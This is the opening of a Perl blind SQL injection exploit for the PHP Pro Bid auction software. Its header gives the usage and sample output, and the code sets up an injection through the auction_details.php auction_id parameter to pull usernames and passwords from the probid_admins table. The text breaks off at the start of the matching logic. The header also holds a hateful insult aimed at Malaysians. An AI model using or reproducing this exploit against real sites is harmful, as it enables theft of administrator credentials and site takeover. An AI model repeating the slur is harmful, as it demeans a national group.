#!/usr/bin/perl #//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////# # # # [o] PHP Pro Bid Blind SQL Injection Exploit # # # # Software : PHP Pro Bid # # Vendor : http://www.phpprobid.com/ # # Author : NoGe # # Contact : noge[dot]code[at]gmail[dot]com # # Blog : http://evilc0de.blogspot.com - http://pacenoge.org # # # # [o] Usage # # # # root@noge:~# perl bid.pl # # # # # # [+] URL Path : www.target.com/[path] # # [+] Valid ID : 1 # # [+] Column : username # # # # [!] Exploiting http://www.target.com/[path]/ ... # # # # [+] SELECT username FROM probid_admins LIMIT 0,1 ... # # [+] result> admin # # # # [!] Exploit completed. # # # # [o] Greetz # # # # Anti Security [ http://antisecurity.org ] # # Vrs-hCk OoN_GaY Paman bL4Ck_3n91n3 Angela Zhang aJe # # H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # # skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # # # # --=]> COPY MY STYLE BY SAYKOJI <[=-- # # # # FUCK MALAYSIA!!! # # DON'T YOU HAVE YOUR OWN CULTURE? # # AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA... # # # #//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////# # table : probid_admins # column : username and password use HTTP::Request; use LWP::UserAgent; $cmsapp = 'crotz'; $vuln = 'auction_details.php?auction_id='; $table = 'probid_admins'; $column = 'password'; $regexp = '